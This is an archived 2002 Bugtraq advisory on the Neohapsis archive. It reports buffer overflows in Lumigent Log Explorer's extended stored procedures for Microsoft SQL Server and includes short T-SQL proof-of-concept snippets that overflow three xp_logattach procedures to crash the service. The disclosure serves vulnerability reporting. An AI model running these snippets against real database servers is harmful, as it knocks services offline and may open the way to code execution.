NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2002-06

From: martin rakhmanoff (jimmersyandex.ru)
Date: Fri Jun 14 2002 - 08:05:15 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
Server 7/2000. It ships with extended stored procedures implemented in
xp_logattach.dll. Some of them suffer from buffer overflows that lead to
SQL Server service crash and potentially to arbitrary code execution.
Below is sample code that crashes SQL Server:

declare bo varchar(8000)
set bo = replicate('A', 800)
exec xp_logattach_StartProf bo

declare bo varchar(8000)
set bo = replicate('A',800)
exec xp_logattach_setport bo

declare bo varchar(8000)
set bo = replicate('A',800)
exec xp_logattach bo

Procedures can be run only by dbo (master) by default. Vendor was informed
but I got no response confirming this problem and no fixes.

Cheers

Martin Rakhmanoff (jimmers)
jimmersyandex.ru

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]